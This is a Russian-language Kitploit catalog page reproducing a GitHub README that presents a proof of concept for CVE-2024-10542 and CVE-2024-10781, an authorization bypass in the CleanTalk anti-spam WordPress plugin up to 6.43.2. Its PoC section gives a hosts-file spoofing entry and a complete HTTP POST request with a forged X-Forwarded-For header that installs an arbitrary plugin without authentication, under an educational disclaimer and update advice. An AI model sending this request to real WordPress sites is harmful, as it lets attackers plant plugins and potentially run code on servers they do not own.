Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-10542 — WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 уязвим для неаутентифицированной произвольной установки плагинов | Kitploit
Инструменты/GitHubGitHub/ubaydev/cve-2024-10542
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 уязвим для неаутентифицированной произвольной установки плагинов

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC уязвимостей CVE-2024-10542 и CVE-2024-10781: Нарушенная аутентификация в плагине Spam protection, AntiSpam, FireWall от CleanTalk <= 6.43.2

Отказ от ответственности:

Информация, предоставленная в этом документе касательно CVE-2024-10542, предназначена только для обучения и образования. Мы не поощряем и не разрешаем использование этой информации в любых вредоносных целях, включая, но не ограничиваясь, эксплуатацию, вмешательство в систему или другие незаконные действия.

Введение:

В условиях всё более сложного цифрового ландшафта обеспечение безопасности веб-сайтов является первостепенной задачей для многих владельцев сайтов. Недавно были обнаружены две критические уязвимости, представляющие значительную угрозу для сайтов на WordPress. Эти уязвимости затрагивают известный плагин CleanTalk, который обеспечивает защиту от спама, антиспам-меры и брандмауэр. Что делает эту ситуацию ещё более срочной? Давайте разберёмся подробнее! Две уязвимости, отслеживаемые как CVE-2024-10542 и CVE-2024-10781, могут позволить неаутентифицированным злоумышленникам устанавливать и активировать вредоносные плагины на уязвимых сайтах. Это не только ставит под угрозу репутацию сайта, но и открывает дверь для выполнения удалённого кода. При оценке CVSS 9.8 из 10 очевидно, что эти уязвимости относятся к категории чрезвычайно опасных. Согласно Wordfence, обе уязвимости связаны с проблемой обхода авторизации, которая может позволить злоумышленнику устанавливать и активировать произвольные плагины. Это, в свою очередь, может открыть путь к удалённому выполнению кода, если активированный плагин сам по себе уязвим.

PoC:

Прежде всего злоумышленники устанавливают файл hosts в своей операционной системе:

root@kitploit:~
127.0.0.1 cleantalk.org

после чего они отправляют запрос следующего вида

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

Заключение:

Кибербезопасность — это ответственность каждого владельца сайта. Поддерживая плагины в актуальном состоянии и сохраняя бдительность в отношении потенциальных уязвимостей, мы можем защитить наши сайты от вредоносных атак. Убедитесь, что вы обновили CleanTalk до последней версии и регулярно проверяйте другие плагины для обеспечения максимальной безопасности. Помните: небольшие шаги могут предотвратить серьёзные катастрофы!

Ссылки:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

Купить мне кофе:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

Благодарности:

Allah, Muhammad SAW, mikemyers, Markdown Monster, моя семья, вам?

Скачать инструмент